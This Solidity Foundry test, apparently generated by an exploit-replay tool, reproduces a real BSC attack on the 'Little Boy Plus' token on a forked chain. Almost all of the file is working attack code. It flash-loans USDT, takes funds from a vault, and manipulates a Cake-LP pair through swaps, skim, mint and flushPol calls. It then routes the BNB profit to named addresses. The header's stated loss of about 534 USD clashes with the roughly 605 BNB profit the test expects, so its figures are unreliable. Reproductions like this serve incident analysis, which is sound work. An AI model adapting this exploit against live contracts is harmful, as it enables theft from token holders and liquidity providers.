// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.20;

import {Test, console2} from "forge-std/Test.sol";
import {LumosPoCBase} from "./LumosPoCBase.sol";

// @KeyInfo - Total Lost : 534.31 USD
// Attacker : 0xb26dfe6b6180a30e2a2d9826867cc7e06631825a
// Attack Contract : 0x202ba7498c65f9f5c49b9c90953b562f9e0538fb
// Vulnerable Contract : N/A
// Attack Tx : 0x55856d9fda4c5be5193561c7d775e823c3d6e499da44aab9da963daf61c50b0c
// Block : 104727184
// Chain : BSC
// Analysis :
//
// @Reproduction
// Verdict : pass
// Economic Proof : attacker_profit_reproduction
// Reproduced Value : N/A
//
// @POC Author
// Generated by LumosKit

contract AttackTest is LumosPoCBase {
    address constant ATTACKER_EOA = LumosAddresses.attacker_eoa;
    address constant ATTACK_CONTRACT = LumosAddresses.attack_contract;
    uint256 constant FORK_BLOCK = 104727183;
    uint256 constant TX_TIMESTAMP = 1781685338;
    uint256 constant TX_BLOCK_NUMBER = 104727184;
    uint256 constant TX_VALUE = 0;

    function setUp() public {
        vm.createSelectFork(vm.envString("LUMOSKIT_FORK_ENDPOINT"));
        if (TX_TIMESTAMP != 0) vm.warp(TX_TIMESTAMP);
        if (TX_BLOCK_NUMBER != 0) vm.roll(TX_BLOCK_NUMBER);
    }

    function testPoC() public {
        _runExploit();
    }

    function _runExploit() internal {
        vm.startPrank(ATTACKER_EOA, ATTACKER_EOA);
        _installRuntime();
        OurAttack attack = OurAttack(payable(ATTACK_CONTRACT));
        _etchHelpers();
        attack.bindHelper(LumosAddresses.attack_helper);
        _expectOutcome(address(attack), LumosAddresses.attack_helper);
        _snapProfit();
        _logBalances("Before exploit");
        attack.executeSetup{value: TX_VALUE}();
        _logBalances("After exploit");
        vm.stopPrank();
        _assertProfit();
    }

    function _installRuntime() internal {
        vm.etch(ATTACK_CONTRACT, type(OurAttack).runtimeCode);
        vm.setNonce(ATTACK_CONTRACT, 1);
    }

    function _etchHelpers() internal {
        vm.etch(LumosAddresses.attack_helper, type(AttackerHelper).runtimeCode);
    }

    function _expectOutcome(address attack, address helper) internal {
        attack;
        helper;
        _expectProfit(LumosAddresses.A_515788_6D1A, address(0), LumosAddresses.ZERO, "BNB", 605555786330933864102);
        _expectProfit(LumosAddresses.attack_helper, helper, LumosAddresses.Cake_LP, "Cake-LP", 23218051024950574782538);
        _expectProfit(
            LumosAddresses.attack_helper, helper, LumosAddresses.Little_Boy_Plus, "Little Boy Plus", 3881277202880720
        );
    }
}

contract OurAttack {
    AttackerHelper public helper;

    constructor() payable {
        _ctorBootstrap();
    }

    function _ctorBootstrap() internal {
        helper = AttackerHelper(payable(LumosAddresses.attack_helper));
    }

    function executeSetup() external payable {
        if (address(helper) == address(0)) _ctorBootstrap();
        _setup();
    }

    function _setup() public {
        {
            address created = LumosAddresses.attack_helper;
            require(created.code.length != 0, "observed helper runtime missing");
        }
        AttackerHelper(payable(LumosAddresses.attack_helper))._helper();
        AttackerHelper(payable(LumosAddresses.attack_helper)).helperCb();
    }

    receive() external payable {}

    fallback() external payable {
        _entryCb();
    }

    function _entryCb() internal {}

    function bindHelper(address attackHelper) external {
        helper = AttackerHelper(payable(attackHelper));
    }

    mapping(uint256 => bool) private _lumosCallbackSeenFlag;
    mapping(uint256 => uint256) private _lumosEntryCallbackCursor;
    mapping(address => uint256) private _lumosBalancerVaultPreBalance;

    function _callbackSeen(uint256 index) internal view returns (bool) {
        return _lumosCallbackSeenFlag[index];
    }

    function _nextEntryCb(uint256 index) internal returns (uint256 ordinal) {
        ordinal = _lumosEntryCallbackCursor[index];
        _lumosEntryCallbackCursor[index] = ordinal + 1;
    }

    function _markCallback(uint256 index) internal {
        _lumosCallbackSeenFlag[index] = true;
    }

    function _recordBalancerPre(address[] memory tokens) internal {
        for (uint256 i = 0; i < tokens.length; i++) {
            _lumosBalancerVaultPreBalance[tokens[i]] =
                IERC20Like(tokens[i]).balanceOf(0xBA12222222228d8Ba445958a75a0704d566BF2C8);
        }
    }

    function lumosRecordBalancerPre(address[] memory tokens) external {
        _recordBalancerPre(tokens);
    }

    function lumosBalancerVaultPreBalance(address token) external view returns (uint256) {
        return _lumosBalancerVaultPreBalance[token];
    }

    function _uintArray0() internal pure returns (uint256[] memory out) {
        out = new uint256[](0);
    }

    function _addressArray2(address a0, address a1) internal pure returns (address[] memory out) {
        out = new address[](2);
        out[0] = a0;
        out[1] = a1;
    }
}

contract AttackerHelper {
    receive() external payable {}

    function onMoolahFlashLoan(uint256 amount, bytes calldata arg1) external payable {
        amount;
        arg1;
        if (!_callbackSeen(1)) flashCallback2();
        bytes memory ret = hex"";
        assembly { return(add(ret, 32), mload(ret)) }
    }

    fallback() external payable {
        if (msg.sig == 0x5258a367) {
            _helperCb();
            bytes memory ret = hex"";
            assembly { return(add(ret, 32), mload(ret)) }
        }
        if (msg.sig == 0xab6291fe) {
            if (!_callbackSeen(2)) _callback();
            bytes memory ret = abi.encode(_uintArray0());
            assembly { return(add(ret, 32), mload(ret)) }
        }
        _entryCb();
    }

    function flashCallback() external payable {
        if (!_callbackSeen(0)) flashCallback2();
        bytes memory ret = hex"";
        assembly { return(add(ret, 32), mload(ret)) }
    }

    function helperCb() external payable {
        _helperCb();
        bytes memory ret = hex"";
        assembly { return(add(ret, 32), mload(ret)) }
    }

    function callback() external payable {
        if (!_callbackSeen(2)) _callback();
        bytes memory ret = abi.encode(_uintArray0());
        assembly { return(add(ret, 32), mload(ret)) }
    }

    function _entryCb() internal {}

    mapping(uint256 => bool) private _lumosCallbackSeenFlag;
    mapping(uint256 => uint256) private _lumosEntryCallbackCursor;
    mapping(address => uint256) private _lumosBalancerVaultPreBalance;

    function _callbackSeen(uint256 index) internal view returns (bool) {
        return _lumosCallbackSeenFlag[index];
    }

    function _nextEntryCb(uint256 index) internal returns (uint256 ordinal) {
        ordinal = _lumosEntryCallbackCursor[index];
        _lumosEntryCallbackCursor[index] = ordinal + 1;
    }

    function _markCallback(uint256 index) internal {
        _lumosCallbackSeenFlag[index] = true;
    }

    function _recordBalancerPre(address[] memory tokens) internal {
        for (uint256 i = 0; i < tokens.length; i++) {
            _lumosBalancerVaultPreBalance[tokens[i]] =
                IERC20Like(tokens[i]).balanceOf(0xBA12222222228d8Ba445958a75a0704d566BF2C8);
        }
    }

    function lumosRecordBalancerPre(address[] memory tokens) external {
        _recordBalancerPre(tokens);
    }

    function lumosBalancerVaultPreBalance(address token) external view returns (uint256) {
        return _lumosBalancerVaultPreBalance[token];
    }

    function _uintArray0() internal pure returns (uint256[] memory out) {
        out = new uint256[](0);
    }

    function _addressArray2(address a0, address a1) internal pure returns (address[] memory out) {
        out = new address[](2);
        out[0] = a0;
        out[1] = a1;
    }

    function flashCallback2() internal {
        _markCallback(0);
        IVault_238A35(LumosAddresses.Vault_238A35)
            .lock(hex"0000000000000000000000000000000000000000000000000000000000000000");
    }

    function _helperCb() internal {
        IERC20Like(LumosAddresses.WBNB).balanceOf(LumosAddresses.ERC1967Proxy);
        uint256 usdtBalanceOfERC1967Proxy = IERC20Like(LumosAddresses.USDT).balanceOf(LumosAddresses.ERC1967Proxy);
        IERC20Like(LumosAddresses.USDT).balanceOf(LumosAddresses.Vault_238A35);
        uint256 wbnbApproveAllowance = type(uint256).max; // value provenance: arg1=type(uint256).max is covered by prior LumosAddresses.WBNB.balanceOf(address) return=417186311670946231156309 with args (LumosAddresses.ERC1967Proxy)
        IERC20Like(LumosAddresses.WBNB).approve(LumosAddresses.ERC1967Proxy, wbnbApproveAllowance);
        uint256 usdtApproveAllowance = type(uint256).max; // value provenance: arg1=type(uint256).max is covered by prior LumosAddresses.USDT.balanceOf(address) return=7772960679833989887601242 with args (LumosAddresses.ERC1967Proxy)
        IERC20Like(LumosAddresses.USDT).approve(LumosAddresses.ERC1967Proxy, usdtApproveAllowance);
        {
            bytes memory flashLoanProof = abi.encode(address(0));
            IERC1967Proxy(LumosAddresses.ERC1967Proxy)
                .flashLoan(LumosAddresses.USDT, 7772960679833989887601242, flashLoanProof);
        }
        uint256 usdtBalanceOfAttackHelper = IERC20Like(LumosAddresses.USDT).balanceOf(LumosAddresses.attack_helper);
        IPancakeRouter(LumosAddresses.PancakeRouter)
            .getAmountsOut(377642570849956957317599, _addressArray2(LumosAddresses.USDT, LumosAddresses.WBNB));
        IERC20Like(LumosAddresses.USDT).transfer(LumosAddresses.Cake_LP_0DAE, usdtBalanceOfAttackHelper);
        IUniswapV2PairLike(LumosAddresses.Cake_LP_0DAE)
            .swap(0, 610555786330933864102, LumosAddresses.attack_helper, hex"");
        uint256 withdrawAvailableAmount = IERC20Like(LumosAddresses.WBNB).balanceOf(address(this)); // natural replay: withdraw only WETH currently held by this replay frame
        if (withdrawAvailableAmount > 610555786330933864102) withdrawAvailableAmount = 610555786330933864102;
        IWBNB(LumosAddresses.WBNB).withdraw(withdrawAvailableAmount);
        {
            (bool ok,) = payable(LumosAddresses.A_484848_4848).call{value: 5000000000000000000}("");
            if (!ok)
            { /* artifact native transfer used contract receive/fallback context not reproduced by direct empty-call replay */ }
        }
        {
            uint256 nativeTransferAmount = address(this).balance;
            if (nativeTransferAmount > 605555786330933864102) nativeTransferAmount = 605555786330933864102;
            (bool ok,) = payable(LumosAddresses.A_515788_6D1A).call{value: nativeTransferAmount}("");
            if (!ok)
            { /* artifact native transfer used contract receive/fallback context not reproduced by direct empty-call replay */ }
        }
    }

    function _callback() internal {
        _markCallback(2);
        uint256 usdtBalanceOfVault238a35 = IERC20Like(LumosAddresses.USDT).balanceOf(LumosAddresses.Vault_238A35);
        IVault_238A35(LumosAddresses.Vault_238A35)
            .take(LumosAddresses.USDT, LumosAddresses.attack_helper, usdtBalanceOfVault238a35);
        IPancakeRouter(LumosAddresses.PancakeRouter)
            .getAmountsOut(1000000000000000000000, _addressArray2(LumosAddresses.USDT, LumosAddresses.Little_Boy_Plus));
        uint256 usdtTransferAmount = 1000000000000000000000; // pseudocode/artifact priority: value provenance: arg1=1000000000000000000000 is covered by prior LumosAddresses.USDT.balanceOf(address) return=34088143961844099311594944 with args (LumosAddresses.Vault_238A35); do not cap to address(this)
        IERC20Like(LumosAddresses.USDT).transfer(LumosAddresses.Cake_LP, usdtTransferAmount);
        IUniswapV2PairLike(LumosAddresses.Cake_LP).swap(0, 24339781623011675529, LumosAddresses.attack_helper, hex"");
        ICake_LP(LumosAddresses.Cake_LP).getReserves();
        uint256 littleBoyPlusBalanceOfAttackHelper =
            IERC20Like(LumosAddresses.Little_Boy_Plus).balanceOf(LumosAddresses.attack_helper);
        IERC20Like(LumosAddresses.Little_Boy_Plus).transfer(LumosAddresses.Cake_LP, littleBoyPlusBalanceOfAttackHelper);
        uint256 usdtTransferAmount_2 = 999770329154540264768; // pseudocode/artifact priority: value provenance: arg1=999770329154540264768 is covered by prior LumosAddresses.USDT.balanceOf(address) return=34088143961844099311594944 with args (LumosAddresses.Vault_238A35); do not cap to address(this)
        IERC20Like(LumosAddresses.USDT).transfer(LumosAddresses.Cake_LP, usdtTransferAmount_2);
        ICake_LP(LumosAddresses.Cake_LP).mint(LumosAddresses.Cake_LP);
        IPolVault(LumosAddresses.PolVault).flushPol();
        {
            bytes memory observedCallData =
                hex"1ee0a72000000000000000000000000051edeab1cea55570b246b3a1e42daba9027c5cc2"; // artifact calldata preserved: pseudocode raw_call action_0027 line 158 requires exact artifact calldata
            (bool ok,) = LumosAddresses.hLBP.call(observedCallData);
            require(ok, "observed selector 0x1ee0a720 failed");
        }
        uint256 usdtTransferAmount_3 = 1000000000000000000; // pseudocode/artifact priority: value provenance: arg1=1000000000000000000 is covered by prior LumosAddresses.USDT.balanceOf(address) return=34088143961844099311594944 with args (LumosAddresses.Vault_238A35); do not cap to address(this)
        IERC20Like(LumosAddresses.USDT).transfer(LumosAddresses.Cake_LP, usdtTransferAmount_3);
        IUniswapV2PairLike(LumosAddresses.Cake_LP).swap(0, 1100000000000000, LumosAddresses.attack_helper, hex"");
        IPancakeRouter(LumosAddresses.PancakeRouter)
            .getAmountsOut(
                15000000000000000000000000, _addressArray2(LumosAddresses.USDT, LumosAddresses.Little_Boy_Plus)
            );
        uint256 usdtTransferAmount_4 = 15000000000000000000000000; // pseudocode/artifact priority: value provenance: arg1=15000000000000000000000000 is covered by prior LumosAddresses.USDT.balanceOf(address) return=34088143961844099311594944 with args (LumosAddresses.Vault_238A35); do not cap to address(this)
        IERC20Like(LumosAddresses.USDT).transfer(LumosAddresses.Cake_LP, usdtTransferAmount_4);
        IUniswapV2PairLike(LumosAddresses.Cake_LP).swap(0, 10436185642129257030800, LumosAddresses.attack_helper, hex"");
        ICake_LP(LumosAddresses.Cake_LP).getReserves();
        IERC20Like(LumosAddresses.Little_Boy_Plus).balanceOf(LumosAddresses.Cake_LP);
        IERC20Like(LumosAddresses.Little_Boy_Plus).balanceOf(LumosAddresses.Cake_LP);
        uint256 littleBoyPlusTransferAmount = 115442628800700239012; // pseudocode/artifact priority: value provenance: arg1=115442628800700239012 is covered by prior LumosAddresses.Little_Boy_Plus.balanceOf(address) return=307847010135200637367 with args (LumosAddresses.Cake_LP); do not cap to address(this)
        IERC20Like(LumosAddresses.Little_Boy_Plus).transfer(LumosAddresses.Cake_LP, littleBoyPlusTransferAmount);
        uint256 usdtTransferAmount_5 = 5790511652692109497206178; // pseudocode/artifact priority: value provenance: arg1=5790511652692109497206178 is covered by prior LumosAddresses.USDT.balanceOf(address) return=34088143961844099311594944 with args (LumosAddresses.Vault_238A35); do not cap to address(this)
        IERC20Like(LumosAddresses.USDT).transfer(LumosAddresses.Cake_LP, usdtTransferAmount_5);
        ICake_LP(LumosAddresses.Cake_LP).skim(LumosAddresses.Cake_LP);
        ICake_LP(LumosAddresses.Cake_LP).mint(LumosAddresses.attack_helper);
        IERC20Like(LumosAddresses.Little_Boy_Plus).transfer(LumosAddresses.attack_helper, 0);
        IERC20Like(LumosAddresses.hLBP).transferFrom(LumosAddresses.Cake_LP, LumosAddresses.A_000000_DEAD, 0);
        uint256 littleBoyPlusBalanceOfAttackHelper_2 =
            IERC20Like(LumosAddresses.Little_Boy_Plus).balanceOf(LumosAddresses.attack_helper);
        IERC20Like(LumosAddresses.Little_Boy_Plus)
            .transfer(LumosAddresses.Cake_LP, littleBoyPlusBalanceOfAttackHelper_2);
        ICake_LP(LumosAddresses.Cake_LP).getReserves();
        IERC20Like(LumosAddresses.Little_Boy_Plus).balanceOf(LumosAddresses.Cake_LP);
        IPancakeRouter(LumosAddresses.PancakeRouter)
            .getAmountsOut(
                141680718661980290585373, _addressArray2(LumosAddresses.Little_Boy_Plus, LumosAddresses.USDT)
            );
        IUniswapV2PairLike(LumosAddresses.Cake_LP)
            .swap(21170154993871220994788545, 0, LumosAddresses.attack_helper, hex"");
        IVault_238A35(LumosAddresses.Vault_238A35).sync(LumosAddresses.USDT);
        IERC20Like(LumosAddresses.USDT).transfer(LumosAddresses.Vault_238A35, usdtBalanceOfVault238a35);
        IVault_238A35(LumosAddresses.Vault_238A35).settle();
    }

    function _attack() internal {
        _markCallback(3);
    }

    function _helper() public {}
}

interface IERC20Like {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external;
    function transfer(address to, uint256 amount) external;
    function transferFrom(address from, address to, uint256 amount) external;
}

interface ILumosWETHLike {
    function deposit() external payable;
}

interface IERC721Like {
    function ownerOf(uint256 tokenId) external view returns (address);
    function getApproved(uint256 tokenId) external view returns (address);
    function isApprovedForAll(address owner, address operator) external view returns (bool);
    function transferFrom(address from, address to, uint256 tokenId) external;
    function safeTransferFrom(address from, address to, uint256 tokenId) external;
}

interface ILumosUniswapV2PairLike {
    function mint(address to) external returns (uint256 liquidity);
    function burn(address to) external returns (uint256 amount0, uint256 amount1);
    function skim(address to) external;
    function sync() external;
    function swap(uint256 amount0Out, uint256 amount1Out, address to, bytes calldata data) external;
}

interface IMulticallLike {
    function multicall(bytes[] calldata data) external returns (bytes[] memory results);
}

struct LumosObservedCall {
    address target;
    bytes data;
}

library LumosAddresses {
    address internal constant ZERO = address(0);
    address internal constant A_000000_DEAD = 0x000000000000000000000000000000000000dEaD; // LumosAddresses.A_000000_DEAD = 0x000000000000000000000000000000000000dead label=unresolved roles=recipient source=unresolved confidence=low
    address internal constant Cake_LP = 0x00e3Ea08fD8CBaD955Ec5d2292Ad637670c31524; // LumosAddresses.Cake_LP = 0x00e3ea08fd8cbad955ec5d2292ad637670c31524 label=PancakePair token_symbol=Cake-LP roles=asset|contract|economic_asset|observed_address|profit_asset|recipient|sender|storage_contract|token_related source=etherscan_v2 confidence=high
    address internal constant PolVault = 0x01c87119a0D1C3730534b8d909eFeB1911b9fdB0; // LumosAddresses.PolVault = 0x01c87119a0d1c3730534b8d909efeb1911b9fdb0 label=PolVault roles=asset|contract|observed_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant A_078802_F1D3 = 0x0788022de7766432375556421D6283749E51f1D3; // LumosAddresses.A_078802_F1D3 = 0x0788022de7766432375556421d6283749e51f1d3 label=unresolved roles=recipient source=unresolved confidence=low
    address internal constant PancakeRouter = 0x10ED43C718714eb63d5aA57B78B54704E256024E; // LumosAddresses.PancakeRouter = 0x10ed43c718714eb63d5aa57b78b54704e256024e label=PancakeRouter roles=observed_address|recipient source=etherscan_v2 confidence=high
    address internal constant A_12EE1D_FE80 = 0x12eE1D7e7eA3e34c4D5A41372639742a3542fe80; // LumosAddresses.A_12EE1D_FE80 = 0x12ee1d7e7ea3e34c4d5a41372639742a3542fe80 label=unresolved roles=observed_address|recipient source=unresolved confidence=low
    address internal constant Cake_LP_0DAE = 0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE; // LumosAddresses.Cake_LP_0DAE = 0x16b9a82891338f9ba80e2d6970fdda79d1eb0dae label=PancakePair token_symbol=Cake-LP roles=asset|contract|observed_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant attack_contract = 0x202bA7498C65F9F5C49b9c90953B562F9e0538FB; // LumosAddresses.attack_contract = 0x202ba7498c65f9f5c49b9c90953b562f9e0538fb label=attack_contract roles=attacker_contract|attacker_entry_contract|code_contract|contract|localized_contract|observed_address|recipient|sender|storage_contract source=localize.localized_call_graph confidence=high
    address internal constant Vault_238A35 = 0x238a358808379702088667322f80aC48bAd5e6c4; // LumosAddresses.Vault_238A35 = 0x238a358808379702088667322f80ac48bad5e6c4 label=Vault roles=asset|contract|observed_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant A_3665B3_B911 = 0x3665B3d4708B07Bd09F7C18724588FA65F2fb911; // LumosAddresses.A_3665B3_B911 = 0x3665b3d4708b07bd09f7c18724588fa65f2fb911 label=unresolved roles=observed_address|recipient source=unresolved confidence=low
    address internal constant A_484848_4848 = 0x4848489f0b2BEdd788c696e2D79b6b69D7484848; // LumosAddresses.A_484848_4848 = 0x4848489f0b2bedd788c696e2d79b6b69d7484848 label=unresolved roles=code_contract|contract|observed_address|recipient|storage_contract source=unresolved confidence=low
    address internal constant A_4D2728_8297 = 0x4d2728B2453137113F968D633D0398666f6A8297; // LumosAddresses.A_4D2728_8297 = 0x4d2728b2453137113f968d633d0398666f6a8297 label=unresolved roles=observed_address|recipient source=unresolved confidence=low
    address internal constant A_4DB412_4D45 = 0x4db412A4579be46311EEbCb3634bF146cAED4d45; // LumosAddresses.A_4DB412_4D45 = 0x4db412a4579be46311eebcb3634bf146caed4d45 label=unresolved roles=observed_address|recipient source=unresolved confidence=low
    address internal constant A_4E8F2E_8BF8 = 0x4E8F2e5a786aE47BC90f6A773b62d8e9103C8bf8; // LumosAddresses.A_4E8F2E_8BF8 = 0x4e8f2e5a786ae47bc90f6a773b62d8e9103c8bf8 label=unresolved roles=observed_address|recipient source=unresolved confidence=low
    address internal constant A_4FD457_3C73 = 0x4Fd457E7DF94EEf150b079308b90E4144Df03C73; // LumosAddresses.A_4FD457_3C73 = 0x4fd457e7df94eef150b079308b90e4144df03c73 label=unresolved roles=observed_address|recipient source=unresolved confidence=low
    address internal constant A_515788_6D1A = 0x515788797914Cb663114aEb806B3CFb6096F6D1A; // LumosAddresses.A_515788_6D1A = 0x515788797914cb663114aeb806b3cfb6096f6d1a label=0x515788797914cb663114aeb806b3cfb6096f6d1a roles=code_contract|contract|economic_holder|observed_address|profit_holder|recipient|storage_contract source=asset_delta.profit_candidates confidence=medium
    address internal constant A_51EDEA_5CC2 = 0x51EDEAb1CEa55570b246b3A1E42DAba9027c5cc2; // LumosAddresses.A_51EDEA_5CC2 = 0x51edeab1cea55570b246b3a1e42daba9027c5cc2 label=unresolved roles=observed_address|recipient source=unresolved confidence=low
    address internal constant attack_helper = 0x5449ded887576f43Fc339851e942eBc1E6F8118b; // LumosAddresses.attack_helper = 0x5449ded887576f43fc339851e942ebc1e6f8118b label=attack_helper roles=asset|attacker_callback_contract|attacker_contract|code_contract|contract|attack_helper_contract|economic_holder|localized_contract|observed_address|profit_holder|recipient|sender|storage_contract source=localize.localized_call_graph confidence=high
    address internal constant USDT = 0x55d398326f99059fF775485246999027B3197955; // LumosAddresses.USDT = 0x55d398326f99059ff775485246999027b3197955 label=unresolved token_symbol=USDT roles=asset|contract|observed_address|recipient|token_related source=unresolved confidence=low
    address internal constant hLBP = 0x5E3cBc82D020be91a989Eb747934104E9AB585Fe; // LumosAddresses.hLBP = 0x5e3cbc82d020be91a989eb747934104e9ab585fe label=unresolved token_symbol=hLBP roles=asset|contract|observed_address|recipient source=unresolved confidence=low
    address internal constant A_7062E3_E42B = 0x7062E324c73824F865Fd9AE9593693420cCfe42b; // LumosAddresses.A_7062E3_E42B = 0x7062e324c73824f865fd9ae9593693420ccfe42b label=unresolved roles=observed_address|recipient source=unresolved confidence=low
    address internal constant A_7AE168_486F = 0x7aE1685AA6bB0847bD3f1a48bAa570dA878a486f; // LumosAddresses.A_7AE168_486F = 0x7ae1685aa6bb0847bd3f1a48baa570da878a486f label=unresolved roles=observed_address|recipient source=unresolved confidence=low
    address internal constant A_86C9EF_46B5 = 0x86C9EFA66bb139cF96d510bF7Aa8363A64B946b5; // LumosAddresses.A_86C9EF_46B5 = 0x86c9efa66bb139cf96d510bf7aa8363a64b946b5 label=unresolved roles=observed_address|recipient source=unresolved confidence=low
    address internal constant Little_Boy_Plus = 0x88886f0fD371dfF856291bAdcEd45922bC888888; // LumosAddresses.Little_Boy_Plus = 0x88886f0fd371dff856291badced45922bc888888 label=LBP token_symbol=Little Boy Plus roles=asset|contract|economic_asset|observed_address|profit_asset|recipient|sender|storage_contract|token_related source=etherscan_v2 confidence=high
    address internal constant A_8D8D67_CA13 = 0x8d8d676E9C2E2D3a644A44DBd272742823DDCA13; // LumosAddresses.A_8D8D67_CA13 = 0x8d8d676e9c2e2d3a644a44dbd272742823ddca13 label=unresolved roles=observed_address|recipient source=unresolved confidence=low
    address internal constant ERC1967Proxy = 0x8F73b65B4caAf64FBA2aF91cC5D4a2A1318E5D8C; // LumosAddresses.ERC1967Proxy = 0x8f73b65b4caaf64fba2af91cc5d4a2a1318e5d8c label=ERC1967Proxy roles=asset|contract|observed_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant attacker_eoa = 0xb26DFE6b6180A30e2A2D9826867cc7e06631825a; // LumosAddresses.attacker_eoa = 0xb26dfe6b6180a30e2a2d9826867cc7e06631825a label=attacker_eoa roles=attacker_eoa|contract|observed_address|sender source=tx_metadata.from confidence=high
    address internal constant BalancerVault = 0xBA12222222228d8Ba445958a75a0704d566BF2C8; // LumosAddresses.BalancerVault = 0xba12222222228d8ba445958a75a0704d566bf2c8 label=BalancerVault roles=known_protocol source=poc_sketch.known_addresses confidence=high
    address internal constant WBNB = 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c; // LumosAddresses.WBNB = 0xbb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c label=unresolved token_symbol=WBNB roles=asset|contract|observed_address|recipient|sender|storage_contract|token_related source=unresolved confidence=low
    address internal constant A_BD1254_EFD8 = 0xbd1254c9Db282CB0Cb7772b4e90FF3186764EFD8; // LumosAddresses.A_BD1254_EFD8 = 0xbd1254c9db282cb0cb7772b4e90ff3186764efd8 label=unresolved roles=observed_address|recipient source=unresolved confidence=low
    address internal constant A_C2C7AF_5016 = 0xC2c7Af29335386EeA1b84dF05567e21823865016; // LumosAddresses.A_C2C7AF_5016 = 0xc2c7af29335386eea1b84df05567e21823865016 label=unresolved roles=asset|contract|observed_address|recipient|sender|storage_contract source=unresolved confidence=low
    address internal constant LFOMO = 0xC6E06d3F7eD6475a555F4E23286a28F9Ed3c7E81; // LumosAddresses.LFOMO = 0xc6e06d3f7ed6475a555f4e23286a28f9ed3c7e81 label=FomoVault token_symbol=LFOMO roles=asset|contract|observed_address|recipient source=etherscan_v2 confidence=high
    address internal constant A_CBD67B_69F0 = 0xCBd67b3464006C3687abdc83cE9B79D1a7d169F0; // LumosAddresses.A_CBD67B_69F0 = 0xcbd67b3464006c3687abdc83ce9b79d1a7d169f0 label=unresolved roles=observed_address|recipient source=unresolved confidence=low
    address internal constant BurnVault = 0xdBa2097923b75921657054Af11BE74475d2105Ee; // LumosAddresses.BurnVault = 0xdba2097923b75921657054af11be74475d2105ee label=BurnVault roles=asset|contract|observed_address|recipient|sender|storage_contract source=etherscan_v2 confidence=high
    address internal constant A_E0FC4F_EE06 = 0xE0fC4f1dbb94A311e9Fd7b4a7fc9Bd79B3d9ee06; // LumosAddresses.A_E0FC4F_EE06 = 0xe0fc4f1dbb94a311e9fd7b4a7fc9bd79b3d9ee06 label=unresolved roles=observed_address|recipient source=unresolved confidence=low
}

interface ICake_LP {
    function getReserves() external view;
    function mint(address) external returns (uint256);
    function skim(address) external;
}

interface IERC1967Proxy {
    function flashLoan(address, uint256, bytes calldata) external;
}

interface IPancakeRouter {
    function getAmountsOut(uint256, address[] calldata) external view;
}

interface IPolVault {
    function flushPol() external returns (uint256);
}

interface IUniswapV2PairLike {
    function swap(uint256, uint256, address, bytes calldata) external;
}

interface IVault_238A35 {
    function lock(bytes calldata) external;
    function settle() external returns (uint256);
    function sync(address) external;
    function take(address, address, uint256) external;
    function sync() external;
}

interface IWBNB {
    function withdraw(uint256) external;
}
